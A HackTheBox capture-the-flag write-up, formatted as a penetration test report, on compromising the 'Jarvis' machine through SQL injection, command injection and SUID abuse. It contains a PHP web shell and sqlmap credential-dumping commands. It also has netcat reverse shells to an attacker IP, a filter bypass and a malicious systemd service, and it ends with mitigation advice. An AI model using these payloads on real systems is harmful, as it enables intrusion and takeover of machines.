htb-writeups

Jarvis Penetration Test Report

Executive Summary

This report documents the complete penetration testing process for the Jarvis machine from HackTheBox. The assessment revealed multiple security vulnerabilities including SQL injection, command injection, and privilege escalation vectors that ultimately led to full system compromise.

Reconnaissance

Initial Scanning

The penetration test began with comprehensive network reconnaissance to identify open ports and services.

export target=10.129.229.137

# Comprehensive port scan
sudo nmap -p- --min-rate 1000 -sT -vvv $target

Scan Results:

• Port 22: SSH service
• Port 80: HTTP service

Service Enumeration

Following the initial discovery, detailed service enumeration was performed:

# Service version detection and default scripts
sudo nmap -sC -sV -p 22,80 -T4 $target

Service Details:

• Port 22: OpenSSH service
• Port 80: Apache HTTP server with web application

---

Vulnerability Assessment

Web Application Analysis

The web application hosted on port 80 was thoroughly examined:

1. Initial Access: http://10.129.229.137/index.php

1. Navigation: Discovered “Rooms & Suites” section

1. Vulnerability Identification: Found SQL injection vulnerability in room booking parameter

SQL Injection Vulnerability

The parameter cod in the URL http://10.129.229.137/room.php?cod=1 was found to be vulnerable to SQL injection:

# Initial vulnerability confirmation
http://10.129.229.137/room.php?cod=1'  # Produced error page

---

Exploitation

Automated SQL Injection Testing

SQLMap was utilized to automate the exploitation process:

# Initial SQL injection detection
sqlmap -u "http://10.129.229.137/room.php?cod=1" --random-agent --batch

# Database enumeration
sqlmap -u "http://10.129.229.137/room.php?cod=1" --random-agent --batch --users --passwords

Credentials Extracted:

• Username: DBadmin
• Password: imissyou

Web Shell Deployment

A PHP web shell was created and uploaded through the SQL injection vulnerability:

<?php system($_REQUEST['cmd']);?>

File Upload Process:

sqlmap -u "http://10.129.229.137/room.php?cod=1" --random-agent --batch --file-write /home/aravinda/Documents/htb-machines/jarvis/exploit.php --file-dest /var/www/html/exploit.php

Reverse Shell Establishment

The web shell was used to establish a reverse shell connection:

# Command execution verification
curl "http://10.129.229.137/exploit.php?cmd=id"

# Reverse shell execution
curl "http://10.129.229.137/exploit.php?cmd=nc+-e+/bin/bash+10.10.14.106+4444"

Shell Access Obtained:

• User: www-data
• Privileges: Limited web server access

---

Post-Exploitation

Privilege Escalation Analysis

Initial privilege escalation vectors were investigated:

# Sudo privileges check
sudo -l

Discovery: User www-data could execute the following command as user pepper without password:

(pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py

Code Analysis

The simpler.py script was analyzed for vulnerabilities:

Key Finding: The exec_ping() function contained command injection vulnerability with limited filtering:

def exec_ping():
    forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    os.system('ping ' + command)

Lateral Movement to Pepper

Bypassing the command injection filters using $() substitution:

# Create exploit script
echo -e '#!/bin/bash \n\n nc -e /bin/bash 10.10.14.106 9005' > /tmp/exploit.sh
chmod +x /tmp/exploit.sh

# Execute through simpler.py
sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
# Input: $(/tmp/exploit.sh)

Access Achieved:

• User: pepper
• User Flag: 1f3eed00bf308856e86ebdaa6a15f208

---

Privilege Escalation

System Analysis

Comprehensive system enumeration was performed:

# Transfer and execute LinPEAS
wget 10.10.14.106/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

Critical Finding:

-rwsr-x--- 1 root pepper 171K Jun 29  2022 /bin/systemctl

Root Privilege Escalation

The SUID systemctl binary was exploited following GTFOBins methodology:

Exploit Service Creation:

cat > /dev/shm/ara.service << 'EOF'
[Unit]
Description=Ara rev shell

[Service]
Type=simple
ExecStart=/bin/bash -c "/bin/nc -e /bin/bash 10.10.14.106 9007"

[Install]
WantedBy=multi-user.target
EOF

Privilege Escalation Execution:

systemctl link /dev/shm/ara.service
systemctl start ara.service

Root Access Achieved:

• User: root
• Root Flag: 7e796f843cc56b7f53d2825105da9968

---

Conclusion

The Jarvis penetration test successfully demonstrated a complete attack chain from initial reconnaissance to full system compromise. The assessment revealed critical security flaws including:

1. SQL Injection in web application parameters
2. Insufficient Input Validation leading to command injection
3. Privilege Escalation via misconfigured SUID binaries

---

Mitigation Recommendations

Immediate Actions

1. Input Validation: Implement strict input validation and parameterized queries
2. File Upload Restrictions: Restrict file upload capabilities and file execution in web directories
3. Principle of Least Privilege: Review and restrict sudo privileges and SUID binaries

Long-term Security Improvements

1. Web Application Firewall: Deploy WAF to detect and prevent SQL injection attacks
2. Code Review: Conduct regular security code reviews for custom applications
3. System Hardening: Implement comprehensive system hardening following security benchmarks
4. Monitoring: Deploy intrusion detection systems and log monitoring

Specific Technical Fixes

• Sanitize all user inputs in the room.php parameter
• Replace os.system() calls with subprocess with proper argument handling
• Remove unnecessary SUID permissions from systemctl
• Implement proper authentication and authorization checks

---

---